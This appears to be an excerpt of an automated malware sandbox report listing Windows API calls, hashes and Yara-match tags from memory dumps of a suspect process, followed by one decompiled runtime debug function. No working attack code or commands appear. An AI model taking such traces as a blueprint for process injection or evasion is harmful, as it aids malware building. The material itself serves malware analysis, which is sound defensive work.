                            • Instruction ID: 05ab19acbbdc3ef02abb6a0463b702aff7bf9393a613def8f94581b90f67f230
                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction Fuzzy Hash: 190152B5D4010DB7DB10DBA4DC82F9DB7799B54308F048195E90897241F631EB14CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: d902da6637b82bd58c1b708efd1ca5fc13f1900c967f613af57d143c082cb42b
                            • Instruction ID: cc369e40eb514621ee3f1f6e5e43e50c9110a6409a626f1b654ebafb55559028
                            • Opcode Fuzzy Hash: d902da6637b82bd58c1b708efd1ca5fc13f1900c967f613af57d143c082cb42b
                            • Instruction Fuzzy Hash: 9E01A4B2200508BFCB54CF99DC80EEB77A9AF8C354F158258FA0DE7241C630E851CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction ID: 4b6145bd626def5eef194570bbe6430c3f8d3af10571934c54a7a5daa41ea169
                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction Fuzzy Hash: D9015FB2214208AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DCCCE0,?,?), ref: 00DD705C
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                            • Instruction ID: 36a95d08162fdaa226b9acdb9e427db87c161c26797cb9de0a36817c5df4b9e1
                            • Opcode Fuzzy Hash: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                            • Instruction Fuzzy Hash: 7FE06D333803043AE6306599AC03FA7B39CDB81B20F140026FA0DEA2C1D595F90142B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DCCCE0,?,?), ref: 00DD705C
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 42603fc3f350f7515e5542f802e97f7819b562266e6d671bb701b52b44e98a52
                            • Instruction ID: 988384f8ff316c359c982a8aa22a9975c11ee45006892e2518d28ca3327c94a6
                            • Opcode Fuzzy Hash: 42603fc3f350f7515e5542f802e97f7819b562266e6d671bb701b52b44e98a52
                            • Instruction Fuzzy Hash: 3BF0E5722813003BD73026A88C03FAB7768DF85B20F180055FA48AB3C2D5A0F90187F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 957f80a45fe485658e22986490e018f08d9bfacf2aa6e57de0e44f510a002bdb
                            • Instruction ID: fc65ea6097c651a49e1c1557193e4d80763ffa82d16581cf9fc4f9c4d7c06c5e
                            • Opcode Fuzzy Hash: 957f80a45fe485658e22986490e018f08d9bfacf2aa6e57de0e44f510a002bdb
                            • Instruction Fuzzy Hash: 68E0C9B2214419AF8B04CF98E890CEB73EDEB8C754B008208FA1CC3200C630E8218B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00DD3526,?,00DD3C9F,00DD3C9F,?,00DD3526,?,?,?,?,?,00000000,00000000,?), ref: 00DD84CD
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction ID: ddb3382e2379569e65a2bee29a67a7db2b3efe78ddd2525594245fc458b1783a
                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction Fuzzy Hash: 6FE012B1200208ABDB14EF99CC41EA777ADEF88650F118559BA085B282CA30F9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFB2,00DCCFB2,?,00000000,?,?), ref: 00DD8670
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction ID: 474bc18020f0f3be657e5de7c3a5265238cb3af09da99965a3882dda4f5810e2
                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction Fuzzy Hash: A3E01AB12002086BDB10DF49CC85EE737ADEF88650F018155BA0857281C930E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,00DC7C73,?), ref: 00DCD44B
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,00DC7C73,?), ref: 00DCD44B
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 53%
                            			E053BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                            				void* _t7;
                            				intOrPtr _t9;
                            				intOrPtr _t10;
                            				intOrPtr* _t12;
                            				intOrPtr* _t13;
                            				intOrPtr _t14;
                            				intOrPtr* _t15;
                            
                            				_t13 = __edx;
                            				_push(_a4);
                            				_t14 =  *[fs:0x18];
                            				_t15 = _t12;
                            				_t7 = E0536CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                            				_push(_t13);
                            				E053B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                            				_t9 =  *_t15;
                            				if(_t9 == 0xffffffff) {
                            					_t10 = 0;
                            				} else {
                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                            				}
                            				_push(_t10);
                            				_push(_t15);
                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                            				return E053B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                            			}











                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053BFDFA
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053BFE01
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053BFE2B
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            Uniqueness

                            Uniqueness Score: -1.00%